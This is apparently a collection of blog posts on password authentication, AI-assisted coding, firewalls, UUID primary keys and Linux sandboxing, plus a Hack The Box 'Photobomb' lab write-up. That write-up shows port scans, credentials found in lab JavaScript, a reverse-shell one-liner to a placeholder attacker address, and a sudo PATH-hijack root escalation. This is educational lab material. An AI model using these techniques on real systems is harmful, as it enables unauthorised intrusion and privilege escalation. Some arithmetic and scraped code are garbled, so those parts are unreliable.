Biometrics & N-factor authentication

Anyone seriously delving into the topic of computer security quickly encounters the issue of password security. Horror stories and myths can easily make you feel like you’re tilting at windmills, like Don Quixote. While proper password management isn’t entirely straightforward, we’re not as helpless against potential attackers as it might initially seem.

Before we dive into the details, it’s essential to understand a fundamental principle: security and convenience are mutually exclusive. The more meticulously a security concept is implemented and enforced, the more cumbersome it becomes in daily use. Therefore, it’s crucial to find a sensible and practical compromise between protection and usability. So, let’s approach this topic step by step to dispel any misconceptions or half-truths.

Basically, we distinguish between two use cases. Authentication ensures that I am indeed the person I claim to be. Authorization ensures that I can only perform actions for which I am authorized. This article deals exclusively with authentication, i.e., logging into a device or service.

When we want to protect a service or device we use from unauthorized access, we essentially put a digital lock on it. The key to this lock is our password. Just like in real life, there are many analogies in the digital world. If we have friends visiting and give them a copy of our house key, they could theoretically make a copy of the key without our knowledge and enter our home without our permission. That’s why we only give our keys to people we trust. It’s similar with the password we use to access digital services like streaming, computer games, or social media. Imagine we want a website and hire someone to create it for us. To make the website accessible online, several contracts need to be signed for servers, domains, and possibly additional software licenses. If I don’t have the technical expertise to handle these things myself, I need someone I trust to take care of them. To ensure this works, I need to give this person my login credentials for the technical systems. As long as I get along well with this person, it’s usually not a problem. Things only get complicated when, for whatever reason, the collaboration breaks down. Then I should at least have the technical knowledge to check my accounts and change the login credentials.

This example also illustrates another problem. If you use the same login credentials for everything you use online, this person could also access my email inbox or do other things in my name in the digital world. That’s why the most important rule of computer security is: never use the same password for multiple services. Of course, there are many other rules of conduct that should be followed when dealing with password security. I’ve made it a habit not to differentiate between my professional and private life. This way, my behavior becomes a habit, and I minimize the possibility of making mistakes.

Before we consider what constitutes a reasonable password with sufficient protection, we need to understand an important concept: the ability to try all possible combinations until the correct key is found. In IT jargon, this concept of systematically trying all possible combinations is called brute force. So, if you lock your bike in an unguarded location with a combination lock that only has four digits, it’s not truly secure. A potential thief only needs to try all the combinations in sequence, starting with 0000, until the lock opens. Even taking your time, testing all possible combinations up to a maximum of 9999 takes no more than 30 minutes. This example leads us to two conclusions. If the bike is parked in a busy location where it would be noticeable if someone fiddled with the lock for more than 5 minutes, this level of protection is sufficient. The second conclusion is that the time required to try all the numbers increases with each additional digit. The technical implementation can become extremely complex, depending on the required level of protection.

One measure website operators use is called information minimization. If you make a mistake during login, you only receive feedback that the login was incorrect. This means we don’t find out whether the user account we’re logging in with is the correct one or whether the password is wrong. The combination of username and password must be correct.

The number of attempts to log in to an existing user account is also limited. Generally, you have three attempts to enter the correct password. Typos or the Caps Lock key can quickly lead to failed attempts. If you enter the password incorrectly a fourth time, a time lock is activated, and you have to wait, for example, five minutes before you can enter the password again. Each subsequent failed attempt doubles the time limit. To allow website operators to gather more information about attackers, up to 100 failed attempts are permitted and logged. However, if you successfully log in in the meantime, the counter is reset. It is important that the operator monitors these processes and takes measures to protect the user account upon detecting attacks. This can sometimes lead to the temporary deactivation of the account. We can see that limiting resources is an essential measure to prevent users from trying all possible password variations indefinitely.

Of course, choosing a strong password is also important. As we’ve already seen, the number of characters is a crucial detail. The number of possible combinations also increases if you expand the character set. With the numbers 0 to 9, we have exactly 10 possibilities per position. If our password has 4 characters, that’s exactly 9999 combinations. In many cases, such as with a bank card, this is sufficient, because after 3 incorrect attempts, the card is blocked. If you try your luck at an ATM, the card will even be confiscated.

If we expand our character set of numbers with uppercase and lowercase letters plus some special characters, we quickly reach a number of combinations exceeding 60 characters per password position. The number of characters varies depending on the language. German, for example, offers the letters ä, ö, ü, and ß, which do not appear in the English alphabet. As we can see, there are cultural differences when it comes to passwords. The characters a-z, A-Z, and 0-9 already offer 62 combinations. A password with 4 characters therefore has (62 * 62 * 62 * 62) = 624 = 1,4776,336 combinations. A person trying all of these combinations would take a very long time. A computer, on the other hand, would only need a few minutes. Therefore, for a secure password, it is necessary to mix as many different characters as possible—numbers, uppercase and lowercase letters, etc.—and to use at least 15 characters. Such passwords are, of course, not easy to remember. Things get more complicated when you have to manage a large number of different passwords. This is where password managers like KeePass, with appropriate browser plugins, provide optimal support. Solutions that suggest storing passwords in the cloud with a company may have good intentions, but they are also popular targets for hackers. This is one reason why, for me, only an offline password manager on my own computer is an option.

With all this knowledge, one might conclude that passwords don’t offer good protection and that it’s better to use other mechanisms. In fact, there are plenty of established solutions, most of which are based on the concept of biometrics. We are familiar with the concept of fingerprint analysis from police investigations. We assume that our bodies have biometric characteristics that no other person possesses, thus allowing our identity to be confirmed beyond doubt. For many years, devices like laptops have had the capability to scan fingerprints and thereby grant access to the device. Besides fingerprints, iris scans and facial recognition are also among the unique biometric features.

What seems very clever at first glance could quickly prove to be a security vulnerability in practical use. The most popular example is Face ID, which allows you to unlock your smartphone using the camera, among other things. Imagine the unpleasant situation where someone forcibly steals your phone, and before the thief is caught, they simply unlock it by holding it up to your face, thus disabling all security checks on the device. While it’s true that stress during such a robbery would severely limit the possibilities, this possibility cannot be completely ruled out. It’s merely a description of a conceivable situation in which strangers could gain unauthorized access to a protected device through biometrics. Therefore, biometrics can only be a supplement to the existing security concept, not the primary measure. Furthermore, it remains unclear how and where the biometric data is stored to protect it from misuse.

Modern security concepts are based on several interconnected components. In addition to a password, various other factors are now used when logging into systems. Two-factor authentication is widely used, where, in addition to the password, the second factor is something you personally possess that no one else can easily access. Currently, the second factor is often a phone number via SMS or email. The application sends a unique code to the registered phone number or email address, which is only valid for a few minutes and then expires. After successful password verification, the security code must be entered. As long as it can be ensured that no one gains access to the second factor, for example, if the phone is stolen, this method is very secure. However, anyone who has ever lost their phone and couldn’t quickly obtain a replacement SIM card with the same phone number has already experienced the vulnerability of this security concept firsthand. This is precisely what makes a robust and strong security concept, one that offers reliable protection even in difficult situations while still allowing for a justified reset.

A security concept can be extended by adding new layers with additional factors, structured like a chain. This is where the term N-factor comes from. The N is a placeholder for the built-in layers. However, it must also be said that the more layers are involved, the more impractical the intended solution becomes for users. Let’s therefore briefly look at the possible factors that can come into play.

  1. Knowledge: Password, PIN
  2. Ownership: Email, token, phone number
  3. Biometrics: Fingerprint
  4. Location: GPS, IP address
  5. Time: Expiration authentication codes
  6. Behavior: Typing speed
  7. Device: Laptop, smartphone, tablet

If we look more closely at this list, we recognize many fragments that are used in various combinations in modern web services. The goal is to strengthen password protection so that even careless users cannot become a gateway for abuse. Because in IT security, too, the principle applies that a chain is only as strong as its weakest link.

Of course, we could only touch upon this topic in this article, and there is much more to mention. For example, we completely omitted the area of ​​cryptography. However, these are topics that are primarily relevant for IT professionals and programmers. For instance, on this blog, you can read an article that deals with the secure storage of passwords in databases. Since I have been working more intensively on reconstructing stolen password hashes as part of the current AI trend, I am quite aware of how important the concepts described in this article and their application are. By cleverly choosing possible combinations, the number of possibilities to be searched can be drastically reduced, thus saving considerable computing power. It is safe to assume that in the foreseeable future we will see a very technical article in the Pentesting category about the possibilities of cracking passwords.


Beyond the Hype: AI-Powered Programming

The prophecy that programmers will become obsolete because computers will essentially program themselves is now several decades old. So far, however, the profession of programmer hasn’t died out. Nevertheless, some fundamental changes have occurred in recent years. The capabilities of current AI systems evoke a wide range of emotions. Some hate it, others love it. However, as is so often the case in life, things aren’t black and white. Therefore, I would like to share my experiences with AI-supported programming and offer an assessment of the overall situation.

The development is exponential. Roughly speaking, performance doubles with each leap in half the time compared to the previous leap.

We are currently in the third iteration. The next iteration, with double the performance, will no longer take 18 months, but a maximum of 9 months. My key takeaway for software development is this: AI can massively support skilled programmers and administrators in their work and significantly boost their performance. However, like everything in life, this also has its downsides. In this article, I’ll take the time to shed some light on the background of this topic.

Some time ago, I kept seeing posts on my timeline on the relevant social media platforms from junior developers raving about vibe coding. At first, I thought it was about creating the optimal atmosphere for working—things like the right music and essential oils to get into the perfect workflow. But no. That wasn’t what it was about. People who knew nothing about programming could suddenly generate code that seemingly did exactly what the authors intended. Sounds great at first, but the reality is quite different.

We’ve been familiar with the “copy-paste” approach for quite some time. We didn’t need AI for that; it wasn’t so long ago that people would Google code snippets and find them on websites like Stack Overflow. Fragments of supposed recommendations were quickly copied into their own codebases, and if it worked, everything was left unchecked, exactly as it had been copied. These self-proclaimed experts weren’t even able to understand the copied code snippets, let alone adapt them correctly to their own projects. Hence the expression “copy-pastes-along.” The fact that these code snippets could cause massive problems in production environments was conveniently ignored by these supposed experts. The spectrum of issues ranged from poor performance to critical security vulnerabilities. This situation hasn’t changed with the widespread availability of AI. Therefore, I predict that in the coming years, a flood of low-quality software will compete for users’ attention.

Here I can only quote Grady Booch again: “A fool with a tool is still a fool.” My observations of using LLM for programming in my own projects have been rather lukewarm. In my experience, it’s mostly project managers and people who can’t program who massively overestimate the capabilities of AI models on social media.

I’m generally a skeptical person and, of course, I’ve tried using the usual suspects—AI models—for my daily work. I specifically looked at the community-created versions, without paying for them. Because with these versions, the world will be flooded with bad software in the future. Here, too, I can cut to the chase. All of Grok’s results in the areas of programming/scripting and configuration were below average. It felt a bit like being in an old forum. Instead of asking those annoying “why” and “how come” questions, Grok failed to get to the point, let alone present a working solution. The model, however, shone with meaningless motivational slogans like “Team leader on steroids.” It reminds me a bit of Joseph Weizenbaum’s statements about virtual conversations and his Eliza chatbot.

Things went somewhat better with Deep Seek. At least it produced usable results. These were also immediately usable and seemingly did what they were intended to do. However, upon closer inspection of the code, it was cluttered with all sorts of unnecessary elements. In these cases, I didn’t conduct any further analysis to determine whether any security-critical issues had arisen. Statistically, one can assume that the more code there is, the higher the probability of errors. Opus, on the other hand, constantly annoyed me by requiring a subscription even for minimal queries. I actually achieved the best results with ChatGPT, although the answers were sometimes contradictory or redundant.

Anyone considering setting up a local instance of one of the free AI models, for example with LM Studio, and buying an exorbitantly expensive graphics card for it, should know: you can save your money. The freely available models are nowhere near as powerful as their commercial counterparts. It also wouldn’t exactly be good for business to create your own competition. The question then arises: when does it actually make sense to work with AI programming models to truly accelerate your output? In my experience, it’s less about what or with what, but more about how. For this, we need to make a few important distinctions.

An AI agent that is directly integrated into the IDE and has complete freedom is not a good idea. You often hear that this AI does things it shouldn’t, and instructions to stop these activities have little effect. Anyone who still insists on trying it is well advised to establish a clean branching model with appropriate access restrictions for the agent. Although I generally reject pull requests in commercial development teams, this strategy is essential when using AI agents. Access to the build logic, such as the Maven POM or Gradle project file, is also forbidden for the agents. The proven security approach applies here as well: as little as possible, as much as necessary. Locking down the build logic prevents the AI ​​agent from arbitrarily defining its own version of dependencies.

It’s also important to ensure that code changes remain manageable and are implemented iteratively. Although it might seem a bit clunky, I use AI to generate functions or classes. I then copy the suggested code snippets into my IDE and review them line by line. Based on my quality criteria, I modify the code and use custom test cases to verify that everything works as intended. Generating extensive test data for late tests is an ideal example of tasks that can and should be delegated to AI. Of course, it’s essential to continuously monitor test quality, for which test coverage is a key indicator. Even though the approach described above takes a bit more time, it offers more advantages over quick fixes. I’m able to understand the code changes and assign them to the relevant requirements. Another significant factor is that this method helps me further develop my programming skills. Quickly skimming and unreflectively accepting the proposed solution will likely cause my skills to atrophy over time, leading to a continuous decline in my performance. This will not secure my job in the long run.

This brings me to another point regarding working with LLM: How can you formulate efficient prompts, i.e., instructions for the model? Since communication with the model occurs via natural language, it’s essential to structure your thoughts effectively in order to articulate them clearly. Therefore, taking a course in prompt engineering is not helpful. If you can’t clearly communicate your ideas and concepts to others, you’ll achieve little success with AI. So, what really matters? The answer is almost so simple it’s easy to miss: clear communication with concise, short, and understandable sentences. No complicated, convoluted sentences to satisfy your ego. Of course, you also need a concrete—fully thought-out—idea of ​​what you expect. Vague formulations can leave (too much) room for interpretation. Anyone who can explain their intentions to a preschooler in a few minutes will also achieve good results with AI. I’d like to leave it at that and discuss another aspect.

I’m often asked how I assess the quality of the source code generated by LLM. The answer isn’t straightforward, as there are various criteria to consider. UI is a whole other story. UI/UX is subject to trends and changes more frequently than business logic. In my Java test automation training courses, I strongly advise against creating UI tests altogether. The reason is that the cost-benefit ratio simply isn’t balanced enough in this area. For generated UI code, this means I only look at functionality and appearance and leave it at that. The situation is completely different with business logic for backend systems. Here, I’ve found that the code produced by LLM is sometimes better in terms of security than that of many programmers. The usual checks, such as SQL parameters, input validation, and filtering, are considered and implemented. However, there’s still room for improvement in performance and readability/understandability. I expect significant improvements in these areas in about two more iterations. This is also a key reason why LLM optimizations of an existing codebase are never truly complete and should be repeated with each new generation of LLM.

My strongest criticism of companies, as well as developers and administrators, who excessively use LLM in their daily projects is that they could quickly lose control of their products/services. The entire issue cannot be categorized as black and white, because the range of nuances is too vast. Therefore, it is up to us to follow the motto of the literary Enlightenment, as exemplified by Immanuel Kant: “Have the courage to use your own understanding.”

Finally, I’d like to discuss the cost factor for high-performance AI models. This is where unpleasant surprises can quickly arise. Let’s assume we have someone with a great startup idea who also has the ability to formulate correct and meaningful requirements clearly. Ideally, they even possess rudimentary programming skills to read, understand, and easily modify source code. This person decides to implement the idea independently, without a programmer. Even if the project is broken down into smaller parts and these tasks are assigned to freelancers, several thousand euros can quickly accumulate, depending on the scope of the work packages. If these tasks are then distributed to AI agents, the usual rates of 20 to 50 euros per month no longer apply. Token-based billing becomes necessary. Depending on the scope of the prompt, a request to the AI ​​then consumes one or more tokens. One token often has a value of one euro/US dollar. If no limit is set, several thousand euros can be consumed in just a few hours. Furthermore, it’s impossible to predict the quality of the generated source code beforehand. Every improvement requires tokens, which must be paid for – a cost factor that doesn’t arise with human developers. Even though AI agents might not seem to incur social security or similar expenses at first glance, this doesn’t mean projects can be implemented more cheaply. What’s more important is having someone on board who knows how to structure source code so that it can be easily extended later.

Firewalls – Reality vs. Myth

The firewall, or firewall, was always a spectacular event in the days of the circus and traveling performers. People or animals would leap through it and be cheered by the crowd. However dramatic such a performance may have seemed to the spectators, the spectacle was quite calculated for the acrobat. After all, we know that fire is one of the most powerful primal elements that humankind has tamed.

In cybersecurity, the firewall is one of the most fundamental protective mechanisms for networked computer systems. This applies to both home computers and mainframes in data centers. However, the idea of ​​igniting one or more rings of fire around a computer is more comparable to a circus spectacle, often melodramatically depicted in movies. Statements like “The first firewall has fallen and the second is already 70% breached” are perfect for the screen but have nothing to do with reality.

Before we delve into the details, let’s briefly consider how computer systems are connected to form a network. The crucial detail we need is the IP address. In simpler terms, the IP address is the telephone number of the computer or device on the network. To connect to another computer, you need to know its IP address, just like a telephone and its phone number. Once the connection is established, information, or data, can be exchanged between the two devices. This information is broken down into small, manageable packets by the various internet protocols. A protocol is a defined set of rules that all participants must follow. This can easily be compared to sending a letter or package through the mail.

  1. Write the letter.
  2. Put the letter in an envelope and seal it.
  3. Write the recipient’s address on the front of the envelope.
  4. Write the sender’s address on the back of the envelope.
  5. Attach a sufficient stamp to the envelope and drop it in the mailbox.
  6. Write the letter.

Write a … Without knowing the internal workings of the postal service, we can assume that the letter will reach its recipient if we follow the protocol correctly. The same applies to the internet. Depending on the type of data, the computer selects a suitable program that implements the protocol for us. Based on the Internet Protocol (IP), which governs the connection between computers, there are other protocols that handle the data. Well-known protocols include HTTP(s) for websites and FTP for sending files.

Now let’s get to the main topic. What exactly is a firewall and what is it used for? Imagine a very long hallway with countless doors—65,536 doors to be precise. These doors can be opened inwards or outwards. We can therefore move from the hallway to the outside (outgoing traffic) or from the outside into the hallway (incoming traffic).

A Browser Game, (c) mediasinres.tv

These doors are called ports in technical jargon, and they have a fixed number. If you install special programs on your computer that can communicate with other computers, these programs are usually bound to such a port. Here’s a small example: Long before WhatsApp and similar apps, there was Internet Relay Chat, or IRC for short. If you installed IRC on your computer, it was hidden behind port 194. An important characteristic of ports is that if a program is already bound to a port, no other program can use that port.

A firewall allows you to selectively block these gateways to and from the internet. Basically, there are four different options for each gateway:

  1. Completely blocked,
  2. Inbound blocked,
  3. Outbound blocked, and
  4. Completely open.

Let’s return to our IRC example. If the gateway is completely blocked, we cannot send or receive messages, even though the program can be started on our computer. It cannot establish a connection to the network. If the inbound gateway is blocked, we cannot receive messages, but we can send them. If the outbound gateway is blocked, we can receive messages, but we cannot send any ourselves.

The biggest problem with using firewalls is that they are often not configured correctly. We distinguish between two options here. The most common option is called a blacklist and only regulates the ports specified in the list. Considering that there are 65,536 ports, this can become a very long and unwieldy list. The risk of forgetting something is very high. The advantage of this option is that it is very robust for inexperienced users. The other option is the so-called whitelist. This works in exactly the opposite way to the blacklist. By default, all ports are closed, and the user must explicitly specify which ports are allowed to be opened. As you can easily imagine, operating in whitelist mode requires a certain amount of user experience. You have to know which port belongs to which program and how to enter these rules into the firewall.

As we can see, the image of drawing a ring of fire around the computer is not a suitable way to visualize how a firewall works. Once the door—that is, on the computer—is blocked, installing another firewall on the computer makes little sense. In this case, the saying “two is better than one” doesn’t apply.

Attacks on firewalls typically involve searching for open ports and then exploiting them. This is done using so-called port scanners. Anyone wanting to try out such a port scanner shouldn’t do so without authorization. Searching for open ports on other people’s computers is already a criminal offense in Germany and many other parts of the world.

Another, very advanced attack scenario involves attacking the firewall program itself. Here, the aim is to find and exploit any existing programming errors in the firewall.

Firewalls are available for every operating system in a wide variety of forms. Professional network devices such as routers and switches may also have integrated firewalls. In this case, the router acts as a network computer and protects all devices connected to it. Before deciding on a specific program, you should find out that it is as easy to use as possible and comes from a reputable manufacturer.

List (incomplete) of the most well-known standard ports:

Portnummer     Servicename Beschreibung
21FTPFile Transfer Protocol
22SSH-SCPSecure Shell
23TelnetTelnet protocol
25SMTPSimple Mail Transfer Protocol
53DNSDomain Name System
80HTTPHypertext Transfer Protocol (HTTP)
110POP3Post Office Protocol v. 3
143IMAP4Internet Message Access Protocol v. 4
443HTTP over SSLHypertext Transfer Protocol Secure (HTTPS)
465SMTP over TLS/SSL, SSMAuthenticated SMTP over TLS/SSL (SMTPS)
587SMTPEmail message submission
993IMAP4 over SSLInternet Message Access Protocol
995POP3 over SSLPost Office Protocol 3
1194OpenVPNOpenVPN
1725SteamValve Steam Client uses port 1725 
2967Symantec AVSymantec System Center
3074XBOX LiveXbox LIVE and Games for Windows
3306MySQLMySQL database system
3724World of WarcraftSome Blizzard games

Photobomb: Hack The Box Write-up

Photobomb is a beginner-level Linux machine designed to provide a hands-on experience in cybersecurity. This setup allows users to apply their skills in identifying and exploiting common vulnerabilities, focusing on authentication, credential handling, and examining web application functionalities. Additionally, it offers opportunities to explore privilege escalation techniques through system scripting configurations. This machine provides a realistic and safe environment for learning about cybersecurity and penetration testing.

Reconnaissance

I started by performing a scan of all open TCP ports on the machine using the command: 

nmap -p- -sS --min-rate 5000 --open -vvv -n -Pn 10.10.11.182 -oG allPorts
> nmap -p- -sS --min-rate 5000 --open -vvv -n -Pn 10.10.11.182 -oG allPorts
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-09 11:31 CST
Initiating SYN Stealth Scan at 11:31
Scanning 10.10.11.182 [65535 ports]
Discovered open port 22/tcp on 10.10.11.182
Discovered open port 80/tcp on 10.10.11.182
Completed SYN Stealth Scan at 11:31, 23.71s elapsed (65535 total ports)
Nmap scan report for 10.10.11.182
Host is up, received user-set (0.45s latency).
Scanned at 2023-12-09 11:31:17 CST for 24s
Not shown: 35879 closed tcp ports (reset), 29654 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE    SERVICE   REASON
22/tcp open     ssh       syn-ack ttl 63
80/tcp open     http      syn-ack ttl 63

Read data files from: /usr/bin/../share/nmap 
Nmap done: 1 IP address (1 host up) scanned in 23.93 seconds
           Raw packets sent: 114608 (5.043MB) | Rcvd: 36317 (1.453MB)

Next, I used the extractPorts script to copy open ports to the clipboard. I then conducted a second nmap scan with this new information: 

nmap -sCV -p22,80 10.10.11.182 -oN targeted

For better visualization, I utilized bat (alias for cat) with the -l flag to highlight the output as if it were Java code. The scan revealed that TCP port 22 (commonly used for SSH) and port 80 (indicating a web server running on nginx) were open. The mention of “Ubuntu” alongside these results suggested a Linux machine.

Visiting http://10.10.11.182 redirected to http://photobomb.htb, but the page was not reachable due to Virtual Hosting. To resolve this, I added an entry with the IP and domain in the /etc/hosts file.

# Static table lookup for hostnames.
# See hosts(5) for details.
# IPV4
127.0.0.1    localhost
127.0.0.1    hack4u.localhost    hack4u
127.0.0.1    hack4u.localdomain  hack4u
10.10.11.182 photobomb.htb  # <- this is the entry we have to add 
#IPV6
::1          localhost  ip6-localhost ip6-loopback
ff02::1      ip6-allnodes
ff02::2      ip6-allrouters

After this adjustment, refreshing the browser displayed the website. Exploring the site revealed an authentication form accessible by clicking “click here!”.

Inspecting the source code (CTRL+U) showed mostly plain HTML, with references to a CSS stylesheet and a JavaScript file named photobomb.js.

<!DOCTYPE html>
<html> 
<head> 
  <title>Photobomb</title> 
  <link type="text/css" rel="stylesheet" href-"styles.css" media="all" /> 
  <script sre="photobomb.Js"></script> 
</head> 
<body>
  <div id="container"> 
    <header>
     <hl><a href-"/">Photobomb</a></h1>
    </header>
    <article>
      <h2>Welcome to your new Photobomb franchise!</h2>
      <p>You will soon be making an amazing income selling premium photographic gifts.</p> 
      <p>This state of-the-art web application is your gateway to this fantastic new life. Your wish is its command.</p>
      <p>To get started, please <a href-"/printer" class-"creds">click here!</a> (the credentials are in your welcome pack) .</p> 
   <p>If you have any problems with your printer, please call our Technical Support team on 4 4283 77468377.</p>
    </article> 
  </div>
</body>
</html>

Examining the photobomb.js script revealed a credentials leak.

function init () { 
  // Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me 
  if (document.cookie.match(/”(.*;)?\s*isPhotoBombTechSupport\s*=\s*[~:}+(=¥)75/)) { 
    document.getElement sByClassName('creds')[0].setAttribute ('href',('http://pHOt0:bOMb! @photobomb.htb/printer'); 
    } 
} 
window.onload = init;

I stored these credentials for potential future use.

Exploitation

Using the discovered credentials, I accessed the website through the authentication form. The website’s functionality involved choosing a picture, format, and size for downloading. I wondered how the HTTP request was structured.

Using Burp Suite, I intercepted the request and sent it to the repeater for modification.

The HTTP 500 internal server error response indicated the possibility of code injection. To exploit this, I created a URL-encoded reverse shell one-liner: 

/bin/bash -c 'sh -i >& /dev/tcp/AttackerIP/AttackerPort 0>&1'

, replacing the IP and port with my listener setup.

Setting up a netcat listener on the designated port and sending the modified request through Burp Suite resulted in a successful reverse shell connection.

For an improved terminal experience, I performed a TTY upgrade.

Privilege Escalation

Investigating potential sudo privileges with 

sudo -l revealed a script, /opt/cleanup.sh

that could be executed without a password.

The script, shown in the following image, contained a line starting with ‘find’ (not /usr/bin/find), allowing me to exploit the PATH variable. I created a file named ‘find’ containing ‘sh’ to hijack the script’s execution path.

I ran the script with a modified PATH, causing it to execute my ‘find’ script instead of the intended binary: 

sudo PATH=$PWD:$PATH /opt/cleanup.sh

This granted me a shell with root privileges, as demonstrated in the final image, where I accessed the root flag.

Conclusion

The Photobomb machine provided a comprehensive learning experience in web exploitation and privilege escalation. Through methodical reconnaissance, code injection, and clever manipulation of system configurations, I gained both user and root access. This exercise underscored the importance of thorough system auditing and the potential dangers of overlooked vulnerabilities.

Universal Unique Identifier – The Better Auto Increment

For developers, databases are an area of ​​application development that shouldn’t be taken lightly. In this article, I’ll address the question of what constitutes suitable primary keys for relational databases like MySQL or PostgreSQL. But before I delve into the technical details, I’d like to briefly describe a scenario I recently encountered.

I was tasked with migrating an online shop system for a project. Since this system had been in productive use for over 10 years, the goal was to upgrade to a new major version. As we were already three major releases behind the current version, we decided to take this opportunity to also get rid of some legacy issues. Essentially, a new shop with a new design and updated functionality was to be set up from scratch, allowing the existing products, orders, and, of course, customer data to be imported into the new shop. So far, so routine.

The complication arose from the fact that the old system had to remain operational until it could be seamlessly replaced by the new version. As is often the case, software evolves. The new version also included significant changes that complicated direct data mapping. Specifically, the issue concerned how product attributes are stored internally. For example, if we sell T-shirts, there might be a white cotton V-neck model available in different sizes. Now, when selecting items from the catalog in the shop view, each individual shirt won’t be displayed in its size. Instead, the product will have a selection box with the different sizes. These product attributes can become extremely complex, depending on the shop.

Nowadays, there are very powerful tools available—not as expensive as a mid-range car—for defining mappings between database schema versions and automatically transferring the data to the new version. This process becomes a real ordeal when primary keys are generated using generic auto-increment. The old system remains active and continuously generates new primary keys, which may already be in use in the new system. This effect is minimized through so-called freezes. This means that until the migration is complete, the shop owner cannot add new products to the shop and can only modify existing product attributes under very limited conditions.

To make data migration easier and less prone to errors, using auto-increment for primary key generation is generally frowned upon in commercial environments. Professional database management systems (DBMS) like Oracle and PostgreSQL cannot even create auto-increments without significant effort. If you still want to use this feature, it’s usually implemented via the persistence framework and not, as with MySQL or MariaDB, as a function within SQL.

Where does the idea of ​​using such a generic primary key even come from? It’s certainly a very simple mechanism that has proven itself and works well in practice. At least as long as you don’t intend to migrate. Another aspect is, of course, historically rooted, back when hard drive storage was expensive and not as readily available as it is today. Back then, every single bit that could be saved counted. This argument is refuted by the availability of inexpensive storage. On the contrary, the disadvantages you incur in terms of maintenance for a few saved megabytes actually outweigh them.

What are therefore suitable primary keys for records in relational databases? Here we distinguish between two categories: natural and generated keys. Since the primary key must be unique and therefore cannot occur twice, there are few natural candidates. The classic example of a user account as a primary key is the email address. The phone number also has this desired property.

Automatically generated primary keys include the auto-increment key already described, which we should avoid. Instead, it’s better to use the Universal Unique Identifier, or UUID for short. All programming languages ​​have an implementation for this. However, there are now several versions of the UUID. Version 7 of the UUID was released not too long ago. Therefore, let’s take a closer look at the properties of the respective versions. The AI ​​Grok presents the versions as follows.

  • Version 1 (Time-based, RFC 4122/9562):
    • Combines a highly precise timestamp (60 bits, 100-nanosecond intervals since October 15, 1582), a 14-bit clock sequence (to prevent clock reversal), and a 48-bit node ID (usually the computer’s MAC address).
    • Disadvantage: The MAC address can reveal the hardware (data protection). The sorting is not optimal because the timestamp bits are not in chronological order.
    • Reference: RFC 9562, Section 5.1.
  • Version 2 (DCE Security):
    • Similar to version 1, but with additional fields for POSIX UID/GID (Local Domain). The timestamp is less precise.
    • Status: Rarely used, not implemented in most libraries, and intended only for very specific legacy DCE applications.
    • Evidence: RFC 9562 mentions it as reserved with reference to old DCE specifications.
  • Versions 3 & 5 (Name-based):
    • Deterministic: A UUID is generated from a namespace and a name using a hash (v3: MD5, v5: SHA-1). Same input → same UUID.
    • Difference: Only the hash algorithm. MD5 is broken, SHA-1 is considered weak → v5 is somewhat better, but neither is suitable for cryptographic security.
    • Evidence: RFC 9562, Sections 5.3 and 5.5.
  • Version 4 (Random):
    • The classic “random” UUID. 122 bits are truly random (or cryptographically secure pseudo-random). No time information, no node ID.
    • Advantage: Maximum unpredictability and privacy.
    • Disadvantage: Not sortable → worse performance than primary keys in databases (index fragmentation).
    • Evidence: RFC 9562, Section 5.4 – considered a secure standard for many applications.
  • Version 6 (Reordered Time-based, RFC 9562):
    • Technically almost identical to v1 (same timestamp, same clock sequence, same node), but the timestamp bits are rearranged (most significant first).
    • This allows v6 UUIDs to be sorted byte-wise by creation time – ideal for databases.
    • Recommendation in the RFC: Use only as a drop-in replacement for existing v1 systems; otherwise, v7 is preferable.
    • Evidence: RFC 9562, Section 5.6 – “field-compatible version of UUIDv1”.
  • Version 7 (Unix Time-based, RFC 9562):
    • Modern variant: 48-bit Unix timestamp in milliseconds (since 1970), followed by 12 bits “rand_a” (can be used for sub-milliseconds or counters) and 62 bits “rand_b” (random).
    • Advantages:
    • Very easy to sort (time is at the beginning).
    • High entropy (74-bit random).
    • No MAC address → better data privacy.
    • Good for distributed systems and database indexes.
    • The RFC explicitly recommends: “Implementations SHOULD utilize UUIDv7 instead of UUIDv1 and UUIDv6 if possible.”
    • Document: RFC 9562, Section 5.7.

The most widespread version so far is version 4, which I also use myself. An important criterion is already familiar from hash algorithms. With hashes, we speak of collisions, meaning when a hash refers to two different texts. We have a similar problem with the generation of UUIDs. In production environments, even with large datasets, these should not be generated multiple times. This would trigger an error in the database system because the uniqueness requirement is violated. The subsequent error handling is more problematic. In order for the data record to still be saved, a new UIID must be generated. I have not yet encountered this situation in my many years of using UUID version 4.

Why should one revert to UUID version 7? It’s about sortability. UUID 7 promises that newer entries will have an ascending date in the first positions. This allows you to identify older entries in descending order.

To use UUID 4 in Java, for example, simply call UUID.randomUUID(). The ORM mapper Hibernate also provides other versions of the UUID via the @GeneratedValue annotation. Of course, you can also use additional libraries like the uuid-creator under the MIT license.

<dependency>
    <groupId>com.github.f4b6a3</groupId>
     <artifactId>uuid-creator</artifactId>
     <version>${version}</version>
</dependency>

In Java, there’s also a way to determine which UUID a string used without an additional library.

UUID uuid = UUID.fromString("123e4567-e89b-12d3-a456-426614174000");

That’s all for today. I hope this article has drawn some attention to the topic and I would be very happy if it gains wider recognition.


Sandboxing on Linux desktops with FireJail

Anyone wanting to use a desktop program under Linux without modifying their existing system needs a special environment known in technical circles as a sandbox. Of course, you can also create a virtual machine with VMware or Oracle’s free VirtualBox, which simulates an entire computer including its operating system, and install programs within it for testing purposes to see how they behave. However, this option consumes a considerable amount of resources and is also somewhat resource-intensive.

But there is also a more lightweight virtualization technology available under Linux that employs various security features not available under Windows. These include, among other things, permissions at the file and directory level. But don’t worry, we won’t delve too deeply into the many details of the individual solutions; instead, we’ll focus primarily on the how and why.

On the server side, there are already proven virtualization programs for isolated and secure environments, such as LXC (Linux Containers) and the widely used Docker. On the desktop, programs like FireJail or BubbleWarp are commonly used to run applications with a graphical user interface in a restricted environment. Before we delve into the details of how this works, let’s consider a few scenarios that explain why all this effort can be worthwhile.

One of the oldest reasons for sandboxing is to create an environment where different versions of software need to be installed simultaneously for testing or development purposes, and the installation routine doesn’t allow this. Typical behavior in such cases is to first uninstall the old version of the software to install the new one, or simply to update the existing version. Setting up a sandbox, a kind of testing environment, helps in these situations.

